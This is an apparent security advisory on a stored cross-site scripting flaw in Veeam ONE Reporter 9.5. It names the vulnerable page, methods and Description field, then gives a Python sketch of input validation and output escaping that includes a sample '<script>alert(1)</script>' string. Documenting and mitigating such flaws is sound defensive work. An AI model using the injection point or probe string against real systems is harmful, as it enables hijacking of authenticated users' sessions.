Vendor: Veeam ONE Reporter
By: Seyed Sadegh Khatami
CVSS: 8.8 (HIGH)
Type: Stored XSS
CWE: 79
Product Name: Veeam ONE Reporter
Affected Version From: 9.5.0.3201
Affected Version To: 9.5.0.3201
Patch Exists: NO
Related CWE: N/A
CPE: a:veeam:veeam_one_reporter:9.5.0.3201
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows Server 2016
2019
Veeam ONE Reporter – Stored Cross-site Scripting (Stored XSS)
Veeam ONE Reporter is vulnerable to stored cross-site scripting (XSS). An attacker can inject malicious JavaScript code into the Description field of the addDashboard or editDashboard methods of the CommonDataHandlerReadOnly.ashx page. This code will be executed when the page is viewed by an authenticated user.
Mitigation:
Input validation should be used to prevent malicious code from being injected into the Description field.
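A sketch of the mitigation applied to a dashboard Description field, as an added example that is not Veeam's code. The function names, the length limit and the in-memory store are assumptions for illustration. It goes one step beyond the input validation named above by also HTML-encoding on output, so values stored before validation existed render as inert text.

```python
import html
import unicodedata

MAX_DESCRIPTION_LEN = 512  # assumed limit, not a documented product value


class InvalidDescription(ValueError):
    """Raised when a submitted Description fails validation."""


def validate_description(raw):
    """Write-path check shared by the add and edit operations (hypothetical)."""
    if not isinstance(raw, str):
        raise InvalidDescription("description must be a string")
    # Normalise first so compatibility forms such as fullwidth '<' (U+FF1C)
    # fold to ASCII before the markup check below.
    text = unicodedata.normalize("NFKC", raw).strip()
    if len(text) > MAX_DESCRIPTION_LEN:
        raise InvalidDescription("description too long")
    # Reject control and format characters other than tab, LF and CR.
    if any(unicodedata.category(c) in ("Cc", "Cf") and c not in "\t\n\r"
           for c in text):
        raise InvalidDescription("control characters not allowed")
    # A plain-text description has no need for markup delimiters.
    if "<" in text or ">" in text:
        raise InvalidDescription("markup characters not allowed")
    return text


def save_dashboard(store, dashboard_id, description):
    """Stand-in for the add/edit handlers: validate before persisting."""
    store[dashboard_id] = validate_description(description)
    return store[dashboard_id]


def render_description(stored):
    """Read-path defence: encode for HTML element or quoted-attribute context."""
    return html.escape(stored, quote=True)


if __name__ == "__main__":
    store = {}
    print(save_dashboard(store, 1, "Weekly backup status"))
    # Constructed sample of a value stored before validation was in place.
    print(render_description("<script>alert(1)</script>"))
```
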